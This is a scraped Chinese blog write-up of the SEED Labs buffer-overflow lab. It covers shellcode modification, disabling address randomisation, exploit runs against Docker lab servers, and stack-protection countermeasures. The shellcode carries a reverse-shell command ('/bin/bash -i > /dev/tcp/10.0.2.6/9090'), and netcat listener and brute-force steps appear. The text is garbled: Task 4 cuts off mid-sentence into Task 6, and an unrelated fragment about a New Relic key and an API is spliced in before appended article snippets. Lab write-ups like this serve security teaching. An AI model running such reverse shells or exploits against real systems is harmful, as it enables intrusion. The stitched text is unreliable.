【SEED Labs 2.0】Buffer-Overflow Attack_嗯嗯哈哈哈哈哈哈嗯嗯哈哈哈的博客

相关文章推荐

自信的酱肘子 · vue常用组件库_vue内置组件-腾讯云开发 ...· 4 月前 ·

追风的麻辣香锅 · unity与Android交互的curren ...· 8 月前 ·

直爽的莴苣 · 数据分析(一)-时序数据采集（zabbix\ ...· 1 年前 ·

欢快的骆驼 · Python实战，爬取金融期货数据_爬取期货 ...· 1 年前 ·

刀枪不入的红薯 · python win subprocess模 ...· 1 年前 ·

进入 shellcode 文件夹。

Task. Please modify the shellcode, so you can use it to delete a file. Please include your modified the
shellcode in the lab report, as well as your screenshots.

根据 Task 的要求，我们对 shellcode_32.py 进行修改，使其能够删除文件。

需要注意的是，shell长度不能变。

然后我们新建 tmpfile 文件并运行 shellcode，过程和结果如下

$ touch tmpfile
$ ./shellcode_32.py
$ ./shellcode_64.py
$ make
$ a32.out
$ a64.out
执行完后，tmpfile 也被删除了。 
Task 2: Level-1 Attack
 
首先关闭 address randomization countermeasure 
$ sudo sysctl -w kernel.randomize_va_space=0
进入 server-code 文件夹下，执行命令 
$ make
$ make install
然后返回其根目录，执行命令启动 docker 
$ dcbuild
$ dcup
进入 attack-code 文件夹，执行 
$ echo hello | nc 10.9.0.5 9090
server 显示 
我们修改 exploit.py 
shellcode 即为刚刚 shellcode_32.py 中的 shellcode   "/bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1           *"
启动新 terminal ，执行监听 
$ nc -lnv 9090
在原来的 terminal 中再次执行 
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090
可以看到获得了权限 
Task 3: Level-2 Attack
 
本 task 重点在于处理不知道大小的 buffer。 
解决方法很简单：不知道 offset，那就挨个试一遍。 
同样的，我们先 echo hello 
$ echo hello | nc 10.9.0.6 9090
修改 exploit.py 
ret 应当大于等于 0xffffd708+308，但应当保证 shellcode 都在 payload 内
offset 为 100-300 之间的某个值 
$ ./exploit.py
$ cat badfile | nc 10.9.0.6 9090
得到了结果 
Task 4: Level-3 Attack
 
本 task 重点在于处理 64 位地址的 buffer。实验手册这样描述本实验遇到的问题： 
 Compared to buffer-overflow attacks on 32-bit machines, attacks on 64-bit machines is more
 difficult. The most difficult part is the address. Although the x64 architecture supports 64-bit address space,
 only the address from 0x00 through 0x00007FFFFFFFFFFF is allowed. That means for every address (8 bytes), the highest two bytes are always zeros. This causes a problem.
 In our buffer-overflow attacks, we need to store at least one address in the payload, and the payload will
 be copied into the stack via strcpy(). We know that the strcpy() function will stop copying when it
 sees a zero. Therefore, if a zero appears in the middle of the payload, the content after the zero cannot be
 copied into the stack. How to solve this problem is the most difficult challenge in this attack. 
解决方法是 ret 采用 little endian，复用地址中的 \0x00\0x00。 
同样的，我们先 echo hello 
$ echo hello | nc 10.9.0.7 9090
修改 exploit.py 
shellcode 即为 shellcode_64.py 中的 shellcodestart 设定为一个较小的值，可以直接取 Task 6: Experimenting with the Address Randomization
 
打开地址随机化 
$ sudo sysctl -w kernel.randomize_va_space=2
各执行两次如下命令 
$ echo hello | nc 10.9.0.5 9090
$ echo hello | nc 10.9.0.7 9090
可以看到，每次地址都不相同，导致攻击困难。 
使用 Task2 中 reverse shell 的 exploit.py 代码，执行命令 
$ ./exploit.py
$ ./brute-force.sh
$ nc -lnv 9090
Tasks 7: Experimenting with Other Countermeasures
 
进入 server-code 文件夹，去除 -fno-stack-protector 编译 stack.c，并将 badfile 作为输入 
可以看到检测到了 stack smashing。 
进入 shellcode 文件夹，去除 -z execstack 编译 call_shellcode.c 并运行 
可以看到，栈不再可执行。 
实验总体难度不大，只要把握住 buffer overflow 的原理，便可以很容易解决各种问题。Task2 为本实验的基础；Task3 做了一点微小的改动；Task4 难度较大，因为 64 位地址的最高两位永远是  $NEW_RELIC_LICENSE_KEY=<your> yarn run devstart 默认情况下，Layers API将在localhost:3000 。 更改Carto实例 默认情况下，API将通过planninglabs ca$ 
一、实验题目
本实验的学习目标是让学生将从课堂上学到的有关缓冲区溢出漏洞的知识进行实践，从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞改变程序的流控制，甚至执行任意代码。此漏洞是由于数据存储（如缓冲区）和控件存储（如返回地址）的混合造成的：数据部分的溢出会影响程序的控制流，因为溢出会改变返回地址。
本实验将提供四台不同的服务器，每台服务器运行一个带有缓冲区溢出漏洞的程序。实验任务是开发一个利用漏洞的程序，并最终获得这些服务器上的r
				Buffer Overflow Attack Lab (Set-UID Version)
Lab链接：https://seedsecuritylabs.org/Labs_20.04/Software/Buffer_Overflow_Setuid/
实验环境：Ubuntu20.04
实验目的：利用Buffer Overflow Attack对拥有Set-UID权限的文件进行攻击，获取root权限
实验文件：Labsetup.zip
实验指导书：
Environment Setup 环境设置
由于当代操作系统已
				实验四  缓冲区溢出漏洞实验室
本实验室的学习目标是让学生们将从课堂上学到的有关缓冲区溢出漏洞的知识付诸行动，从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞更改程序的流控制，从而导致恶意代码的执行。
在本实验室中，学生将获得一个具有缓冲区溢出漏洞的程序；他们的任务是开发一个利用漏洞的方案，并最终获得根权限。除攻击外，还将引导学生了解操作系统中实施的几种保护方案，以抵御缓冲区溢出攻击。学生需要评估这些计划是否有效，并解释原因
2. 安装LAMP或WAMP环境，确保Apache、MySQL和PHP已经安装并配置好。
3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。
4. 在MySQL中创建一个名为“sqli-labs”的数据库，并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。
5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php，这将创建所需的数据库表和数据。
6. 访问http://localhost/sqli-labs-master/index.html，您将看到sqli-labs的主页。
7. 点击“Lessons”链接，您将看到一系列的SQL注入漏洞测试用例，您可以选择其中的一个进行测试。
8. 在测试用例页面中，您可以看到注入点和注入语句，您可以使用工具如SQLMap等进行注入测试。
希望这个安装教程对您有所帮助。